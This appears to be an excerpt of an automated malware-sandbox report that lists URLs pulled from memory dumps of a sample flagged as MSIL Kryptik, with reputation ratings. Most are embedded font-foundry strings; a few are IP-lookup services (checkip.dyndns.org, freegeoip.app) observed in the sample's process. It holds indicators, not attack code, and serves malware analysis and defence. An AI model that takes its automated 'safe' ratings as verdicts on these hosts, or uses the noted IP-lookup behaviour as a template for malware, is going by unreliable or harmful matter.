http://www.founder.com.cn/cnthe	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347164026.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347319272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347203168.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cno.-x	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp/Hi	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.341802100.0000000005F42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comCo	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comHi	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352028891.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ascendercorp.com/typedesigners.html	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434130725.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606451041.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.como.	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348852099.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com.TTF	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://freegeoip.app	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606555981.0000000003337000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cnorm	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Ai	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350523960.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350352934.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350660943.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350431962.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350740231.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350463469.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350382122.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350322150.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350247010.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.357645729.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comFwi	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352677508.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353023886.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353202982.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352949197.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353439899.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353305139.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comcoma	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354215467.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354138837.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354002677.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353944829.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354300800.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/14436606/23354	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434562162.0000000003239000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434179664.00000000030FB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.guw	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comW	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/sdi	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comitut	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355070094.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355263828.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354957925.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356140272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355132775.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/8hd	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.como.L	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comr	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comp	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606451041.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comdHi	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354659505.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://freegeoip.app4Wk	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comduv	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
